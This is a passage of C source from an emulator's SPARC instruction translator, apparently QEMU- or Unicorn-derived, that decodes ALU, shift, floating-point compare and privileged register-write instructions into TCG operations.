fmovqcc %xcc */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(1, q); break; #undef FMOVCC #endif case 0x51: /* fcmps, V9 %fcc */ cpu_src1_32 = gen_load_fpr_F(dc, rs1); cpu_src2_32 = gen_load_fpr_F(dc, rs2); gen_op_fcmps(tcg_ctx, rd & 3, cpu_src1_32, cpu_src2_32); break; case 0x52: /* fcmpd, V9 %fcc */ cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_op_fcmpd(tcg_ctx, rd & 3, cpu_src1_64, cpu_src2_64); break; case 0x53: /* fcmpq, V9 %fcc */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_op_load_fpr_QT0(tcg_ctx, QFPREG(rs1)); gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs2)); gen_op_fcmpq(tcg_ctx, rd & 3); break; case 0x55: /* fcmpes, V9 %fcc */ cpu_src1_32 = gen_load_fpr_F(dc, rs1); cpu_src2_32 = gen_load_fpr_F(dc, rs2); gen_op_fcmpes(tcg_ctx, rd & 3, cpu_src1_32, cpu_src2_32); break; case 0x56: /* fcmped, V9 %fcc */ cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_op_fcmped(tcg_ctx, rd & 3, cpu_src1_64, cpu_src2_64); break; case 0x57: /* fcmpeq, V9 %fcc */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_op_load_fpr_QT0(tcg_ctx, QFPREG(rs1)); gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs2)); 
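/* Compare the 128-bit values staged in QT0/QT1 and update the selected %fcc field. */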
gen_op_fcmpeq(tcg_ctx, rd & 3); break; default: goto illegal_insn; } } else if (xop == 0x2) { TCGv dst = gen_dest_gpr(dc, rd); rs1 = GET_FIELD(insn, 13, 17); if (rs1 == 0) { /* clr/mov shortcut : or %g0, x, y -> mov x, y */ if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); tcg_gen_movi_tl(tcg_ctx, dst, simm); gen_store_gpr(dc, rd, dst); } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2 == 0) { tcg_gen_movi_tl(tcg_ctx, dst, 0); gen_store_gpr(dc, rd, dst); } else { cpu_src2 = gen_load_gpr(dc, rs2); gen_store_gpr(dc, rd, cpu_src2); } } } else { cpu_src1 = get_src1(dc, insn); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); tcg_gen_ori_tl(tcg_ctx, dst, cpu_src1, simm); gen_store_gpr(dc, rd, dst); } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2 == 0) { /* mov shortcut: or x, %g0, y -> mov x, y */ gen_store_gpr(dc, rd, cpu_src1); } else { cpu_src2 = gen_load_gpr(dc, rs2); tcg_gen_or_tl(tcg_ctx, dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, dst); } } } #ifdef TARGET_SPARC64 } else if (xop == 0x25) { /* sll, V9 sllx */ cpu_src1 = get_src1(dc, insn); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); if (insn & (1 << 12)) { tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); } else { tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); } } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); cpu_tmp0 = get_temp_tl(dc); if (insn & (1 << 12)) { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); } else { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); } tcg_gen_shl_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } gen_store_gpr(dc, rd, cpu_dst); } else if (xop == 0x26) { /* srl, V9 srlx */ cpu_src1 = get_src1(dc, insn); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); if (insn & (1 << 12)) { tcg_gen_shri_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); } else { tcg_gen_andi_i64(tcg_ctx, cpu_dst, cpu_src1, 0xffffffffULL); tcg_gen_shri_i64(tcg_ctx, cpu_dst, cpu_dst, simm & 0x1f); } } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); cpu_tmp0 = get_temp_tl(dc); if (insn & (1 << 12)) { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); tcg_gen_shr_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } else { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_andi_i64(tcg_ctx, cpu_dst, cpu_src1, 0xffffffffULL); tcg_gen_shr_i64(tcg_ctx, cpu_dst, cpu_dst, cpu_tmp0); } } gen_store_gpr(dc, rd, cpu_dst); } else if (xop == 0x27) { /* sra, V9 srax */ cpu_src1 = get_src1(dc, insn); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); if (insn & (1 << 12)) { tcg_gen_sari_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); } else { tcg_gen_ext32s_i64(tcg_ctx, cpu_dst, cpu_src1); tcg_gen_sari_i64(tcg_ctx, cpu_dst, cpu_dst, simm & 0x1f); } } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); cpu_tmp0 = get_temp_tl(dc); if (insn & (1 << 12)) { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); tcg_gen_sar_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } else { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_ext32s_i64(tcg_ctx, cpu_dst, cpu_src1); tcg_gen_sar_i64(tcg_ctx, cpu_dst, cpu_dst, cpu_tmp0); } } gen_store_gpr(dc, rd, cpu_dst); #endif } else if (xop < 0x36) { if (xop < 0x20) { cpu_src1 = get_src1(dc, insn); cpu_src2 = get_src2(dc, insn); switch (xop & ~0x10) { case 0x0: /* add */ if (xop & 0x10) { gen_op_add_cc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, 
CC_OP_ADD); dc->cc_op = CC_OP_ADD; } else { tcg_gen_add_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); } break; case 0x1: /* and */ tcg_gen_and_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x2: /* or */ tcg_gen_or_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x3: /* xor */ tcg_gen_xor_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x4: /* sub */ if (xop & 0x10) { gen_op_sub_cc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); dc->cc_op = CC_OP_SUB; } else { tcg_gen_sub_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); } break; case 0x5: /* andn */ tcg_gen_andc_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x6: /* orn */ tcg_gen_orc_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x7: /* xorn */ tcg_gen_eqv_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x8: /* addx, V9 addc */ gen_op_addx_int(dc, cpu_dst, cpu_src1, cpu_src2, (xop & 0x10)); break; #ifdef TARGET_SPARC64 case 0x9: /* V9 mulx */ tcg_gen_mul_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); break; #endif case 0xa: /* umul */ CHECK_IU_FEATURE(dc, MUL); gen_op_umul(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0xb: /* smul */ CHECK_IU_FEATURE(dc, MUL); gen_op_smul(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0xc: /* subx, V9 subc */ gen_op_subx_int(dc, cpu_dst, cpu_src1, cpu_src2, (xop & 0x10)); break; #ifdef TARGET_SPARC64 case 0xd: /* V9 udivx */ gen_helper_udivx(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); break; #endif case 0xe: /* udiv */ CHECK_IU_FEATURE(dc, DIV); if (xop & 0x10) { gen_helper_udiv_cc(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); dc->cc_op = CC_OP_DIV; } else { gen_helper_udiv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); } break; case 0xf: /* sdiv */ CHECK_IU_FEATURE(dc, DIV); if (xop & 0x10) { gen_helper_sdiv_cc(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); dc->cc_op = CC_OP_DIV; } else { gen_helper_sdiv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); } break; default: goto illegal_insn; } gen_store_gpr(dc, rd, cpu_dst); } else { cpu_src1 = get_src1(dc, insn); cpu_src2 = get_src2(dc, insn); switch (xop) { case 0x20: /* taddcc */ gen_op_add_cc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); 
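/* Record the tagged-add CC state so the flags can be evaluated lazily. */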
tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_TADD); dc->cc_op = CC_OP_TADD; break; case 0x21: /* tsubcc */ gen_op_sub_cc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_TSUB); dc->cc_op = CC_OP_TSUB; break; case 0x22: /* taddcctv */ gen_helper_taddcctv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); dc->cc_op = CC_OP_TADDTV; break; case 0x23: /* tsubcctv */ gen_helper_tsubcctv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); dc->cc_op = CC_OP_TSUBTV; break; case 0x24: /* mulscc */ update_psr(dc); gen_op_mulscc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADD); dc->cc_op = CC_OP_ADD; break; #ifndef TARGET_SPARC64 case 0x25: /* sll */ if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); tcg_gen_shli_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); } else { /* register */ cpu_tmp0 = get_temp_tl(dc); tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_shl_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } gen_store_gpr(dc, rd, cpu_dst); break; case 0x26: /* srl */ if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); tcg_gen_shri_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); } else { /* register */ cpu_tmp0 = get_temp_tl(dc); tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_shr_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } gen_store_gpr(dc, rd, cpu_dst); break; case 0x27: /* sra */ if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); tcg_gen_sari_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); } else { /* register */ cpu_tmp0 = get_temp_tl(dc); tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_sar_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } gen_store_gpr(dc, rd, cpu_dst); break; #endif case 0x30: { cpu_tmp0 = get_temp_tl(dc); switch(rd) { case 0: /* wry */ tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_y, cpu_tmp0, 0xffffffff); break; #ifndef TARGET_SPARC64 case 0x01: /* undefined in the SPARCv8 manual, nop on the microSPARC II */ case 0x02: case 0x03: case 0x04: case 0x05: case 0x06: case 0x07: case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x0e: case 0x0f: case 0x10: /* implementation-dependent in the SPARCv8 manual, nop on the microSPARC II */ case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: if ((rd == 0x13) && (dc->def->features & CPU_FEATURE_POWERDOWN)) { /* LEON3 power-down */ save_state(dc); gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); } break; #else case 0x2: /* V9 wrccr */ tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_wrccr(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_FLAGS); dc->cc_op = CC_OP_FLAGS; break; case 0x3: /* V9 wrasi */ tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, 0xff); tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, asi)); /* End TB to notice changed ASI. 
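Translation caches the ASI in dc->asi, so code after this point must be retranslated to see the new value.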
*/ save_state(dc); gen_op_next_insn(tcg_ctx); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; break; case 0x6: /* V9 wrfprs */ tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); tcg_gen_trunc_tl_i32(tcg_ctx, tcg_ctx->cpu_fprs, cpu_tmp0); dc->fprs_dirty = 0; save_state(dc); gen_op_next_insn(tcg_ctx); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; break; case 0xf: /* V9 sir, nop if user */ if (supervisor(dc)) { ; // XXX } break; case 0x13: /* Graphics Status */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_gsr, cpu_src1, cpu_src2); break; case 0x14: /* Softint set */ if (!supervisor(dc)) goto illegal_insn; tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_set_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 0x15: /* Softint clear */ if (!supervisor(dc)) goto illegal_insn; tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_clear_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 0x16: /* Softint write */ if (!supervisor(dc)) goto illegal_insn; tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_write_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 0x17: /* Tick compare */ if (!supervisor(dc)) goto illegal_insn; { TCGv_ptr r_tickptr; tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_tick_cmpr, cpu_src1, cpu_src2); r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_limit(tcg_ctx, r_tickptr, tcg_ctx->cpu_tick_cmpr); tcg_temp_free_ptr(tcg_ctx, r_tickptr); /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 0x18: /* System tick */ if (!supervisor(dc)) goto illegal_insn; { TCGv_ptr r_tickptr; tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, stick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_count(tcg_ctx, r_tickptr, cpu_tmp0); tcg_temp_free_ptr(tcg_ctx, r_tickptr); /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 0x19: /* System tick compare */ if (!supervisor(dc)) goto illegal_insn; { TCGv_ptr r_tickptr; tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_stick_cmpr, cpu_src1, cpu_src2); r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, stick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_limit(tcg_ctx, r_tickptr, tcg_ctx->cpu_stick_cmpr); tcg_temp_free_ptr(tcg_ctx, r_tickptr); /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 0x10: /* Performance Control */ case 0x11: /* Performance Instrumentation Counter */ case 0x12: /* Dispatch Control */ #endif default: goto illegal_insn; } } break; case 0x31: /* wrpsr, V9 saved, restored */ { if (!supervisor(dc)) goto priv_insn; #ifdef TARGET_SPARC64 switch (rd) { case 0: gen_helper_saved(tcg_ctx, tcg_ctx->cpu_env); break; case 1: gen_helper_restored(tcg_ctx, tcg_ctx->cpu_env); break; case 2: /* UA2005 allclean */ case 3: /* UA2005 otherw */ case 4: /* UA2005 normalw */ case 5: /* UA2005 invalw */ // XXX default: goto illegal_insn; } #else cpu_tmp0 = get_temp_tl(dc); tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_wrpsr(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); tcg_gen_movi_i32(tcg_ctx, 
tcg_ctx->cpu_cc_op, CC_OP_FLAGS); dc->cc_op = CC_OP_FLAGS; save_state(dc); gen_op_next_insn(tcg_ctx); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; #endif } break; case 0x32: /* wrwim, V9 wrpr */ { if (!supervisor(dc)) goto priv_insn; cpu_tmp0 = get_temp_tl(dc); tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); #ifdef TARGET_SPARC64 switch (rd) { case 0: // tpc { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tpc)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 1: // tnpc { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tnpc)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 2: // tstate { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tstate)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 3: // tt { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tt)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 4: // tick { TCGv_ptr r_tickptr; r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_count(tcg_ctx, r_tickptr, cpu_tmp0); tcg_temp_free_ptr(tcg_ctx, r_tickptr); /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 5: // tba tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_tbr, cpu_tmp0); break; case 6: // pstate save_state(dc); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_wrpstate(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } dc->npc = DYNAMIC_PC; break; case 7: // tl save_state(dc); tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tl)); dc->npc = DYNAMIC_PC; break; case 8: // pil if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_wrpil(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } break; case 9: // cwp gen_helper_wrcwp(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 10: // cansave tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, cansave)); break; case 11: // canrestore tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, canrestore)); break; case 12: // cleanwin tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, cleanwin)); break; case 13: // otherwin tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, otherwin)); break; case 14: // wstate tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, wstate)); break; case 16: // UA2005 gl CHECK_IU_FEATURE(dc, GL); gen_helper_wrgl(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 26: // UA2005 strand status CHECK_IU_FEATURE(dc, HYPV); if (!hypervisor(dc)) goto priv_insn; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_ssr, cpu_tmp0); break; default: goto illegal_insn; } #else tcg_gen_trunc_tl_i32(tcg_ctx, tcg_ctx->cpu_wim, cpu_tmp0); if (dc->def->nwindows != 32) { tcg_gen_andi_tl(tcg_ctx, 
tcg_ctx->cpu_wim, tcg_ctx->cpu_wim, (1 << dc->def->nwindows) - 1); } #endif } break; case 0x33: /* wrtbr, UA2005 wrhpr */ { #ifndef TARGET_SPARC64 if (!supervisor(dc)) goto priv_insn; tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_tbr, cpu_src1, cpu_src2); #else CHECK_IU_FEATURE(dc, HYPV); if (!hypervisor(dc)) goto priv_insn; cpu_tmp0 = get_temp_tl(dc); tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); switch (rd) { case 0: // hpstate tcg_gen_st_i64(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, hpstate)); save_state(dc); gen_op_next_insn(tcg_ctx); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; break; case 1: // htstate // XXX gen_op_wrhtstate(); break; case 3: // hintp tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_hintp, cpu_tmp0); break; case 5: // htba tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_htba, cpu_tmp0); break; case 31: // hstick_cmpr { TCGv_ptr r_tickptr; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_hstick_cmpr, cpu_tmp0); r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, hstick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_limit(tcg_ctx, r_tickptr, tcg_ctx->cpu_hstick_cmpr); tcg_temp_free_ptr(tcg_ctx, r_tickptr); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 6: // hver readonly default: goto illegal_insn; } #endif } break; #ifdef TARGET_SPARC64 case 0x2c: /* V9 movcc */ { int cc = GET_FIELD_SP(insn, 11, 12); int cond = GET_FIELD_SP(insn, 14, 17); DisasCompare cmp; TCGv dst; if (insn & (1 << 18)) { if (cc == 0) { gen_compare(&cmp, 0, cond, dc); } else if (cc == 2) { gen_compare(&cmp, 1, cond, dc); } else { goto illegal_insn; } } else { gen_fcompare(tcg_ctx, &cmp, cc, cond); } /* The get_src2 above loaded the normal 13-bit immediate field, not the 11-bit field we have in movcc. But it did handle the reg case. */ if (IS_IMM) { simm = GET_FIELD_SPs(insn, 0, 10); tcg_gen_movi_tl(tcg_ctx, cpu_src2, simm); } dst = gen_load_gpr(dc, rd); tcg_gen_movcond_tl(tcg_ctx, cmp.cond, dst, cmp.c1, cmp.c2, cpu_src2, dst); free_compare(tcg_ctx, &cmp); gen_store_gpr(dc, rd, dst); break; } case 0x2d: /* V9 sdivx */ gen_helper_sdivx(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); break; case 0x2e: /* V9 popc */ tcg_gen_ctpop_tl(tcg_ctx, cpu_dst, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); break; case 0x2f: /* V9 movr */ { int cond = GET_FIELD_SP(insn, 10, 12); DisasCompare cmp; TCGv dst; gen_compare_reg(tcg_ctx, &cmp, cond, cpu_src1); /* The get_src2 above loaded the normal 13-bit immediate field, not the 10-bit field we have in movr. But it did handle the reg case. 
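The immediate form re-extracts the field below, sign-extended from 10 bits.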
*/ if (IS_IMM) { simm = GET_FIELD_SPs(insn, 0, 9); tcg_gen_movi_tl(tcg_ctx, cpu_src2, simm); } dst = gen_load_gpr(dc, rd); tcg_gen_movcond_tl(tcg_ctx, cmp.cond, dst, cmp.c1, cmp.c2, cpu_src2, dst); free_compare(tcg_ctx, &cmp); gen_store_gpr(dc, rd, dst); break; } #endif default: goto illegal_insn; } } } else if (xop == 0x36) { /* UltraSparc shutdown, VIS, V8 CPop1 */ #ifdef TARGET_SPARC64 int opf = GET_FIELD_SP(insn, 5, 13); rs1 = GET_FIELD(insn, 13, 17); rs2 = GET_FIELD(insn, 27, 31); if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } switch (opf) { case 0x000: /* VIS I edge8cc */ CHECK_FPU_FEATURE(dc, VIS1); cpu_src1 = gen_load_gpr(dc, rs1); cpu_src2 = gen_load_gpr(dc, rs2); gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 1, 0); gen_store_gpr(dc, rd, cpu_dst); break; case 